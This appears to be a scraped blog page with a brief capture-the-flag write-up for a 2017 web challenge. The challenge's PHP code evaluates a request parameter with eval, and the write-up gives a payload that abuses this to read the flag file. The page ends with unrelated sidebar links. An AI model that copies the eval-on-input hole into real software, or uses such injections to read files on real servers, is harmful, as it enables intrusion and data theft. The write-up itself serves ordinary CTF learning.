当前位置:网站首页>The "Baidu Cup" CTF competition was held in February 2017, Web: explosion-2
The "Baidu Cup" CTF competition was held in February 2017, Web: explosion-2
2022-07-05 13:19:00 【Part 02】
Topic content :
flag Not in variable .
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);?hello=file('flag.php')
file Commands can be read directly
file_get_contents It's OK , But in the source code
边栏推荐
- MATLAB论文图表标准格式输出(干货)
- 精彩速递|腾讯云数据库6月刊
- 程序员成长第八篇:做好测试工作
- [daily question] 1200 Minimum absolute difference
- 《2022年中國銀行業RPA供應商實力矩陣分析》研究報告正式啟動
- Rocky basic command 3
- CloudCompare——点云切片
- Natural language processing from Xiaobai to proficient (4): using machine learning to classify Chinese email content
- 峰会回顾|保旺达-合规和安全双驱动的数据安全整体防护体系
- go map
猜你喜欢
Sorry, we can't open xxxxx Docx, because there is a problem with the content (repackaging problem)
Hiengine: comparable to the local cloud native memory database engine
MSTP and eth trunk
STM32 and motor development (from architecture diagram to documentation)
Can and can FD
Write API documents first or code first?
ASEMI整流桥HD06参数,HD06图片,HD06应用
Introduction to sap ui5 flexiblecolumnlayout control
How to protect user privacy without password authentication?
Pandora IOT development board learning (HAL Library) - Experiment 7 window watchdog experiment (learning notes)
随机推荐
Word document injection (tracking word documents) incomplete
【Hot100】34. 在排序数组中查找元素的第一个和最后一个位置
A specific example of ABAP type and EDM type mapping in SAP segw transaction code
JS to determine whether an element exists in the array (four methods)
There is no monitoring and no operation and maintenance. The following is the commonly used script monitoring in monitoring
Discussion on error messages and API versions of SAP ui5 getsaplogonlanguage is not a function
【Hot100】33. 搜索旋转排序数组
量价虽降,商业银行结构性存款为何受上市公司所偏爱?
什么是网络端口
Reverse Polish notation
Could not set property ‘id‘ of ‘class XX‘ with value ‘XX‘ argument type mismatch 解决办法
Get you started with Apache pseudo static configuration
MySQL splits strings for conditional queries
OpenHarmony应用开发之Navigation组件详解
Simple page request and parsing cases
Rocky基础命令3
Asemi rectifier bridge hd06 parameters, hd06 pictures, hd06 applications
解决uni-app配置页面、tabBar无效问题
Halcon template matching actual code (I)
Write API documents first or code first?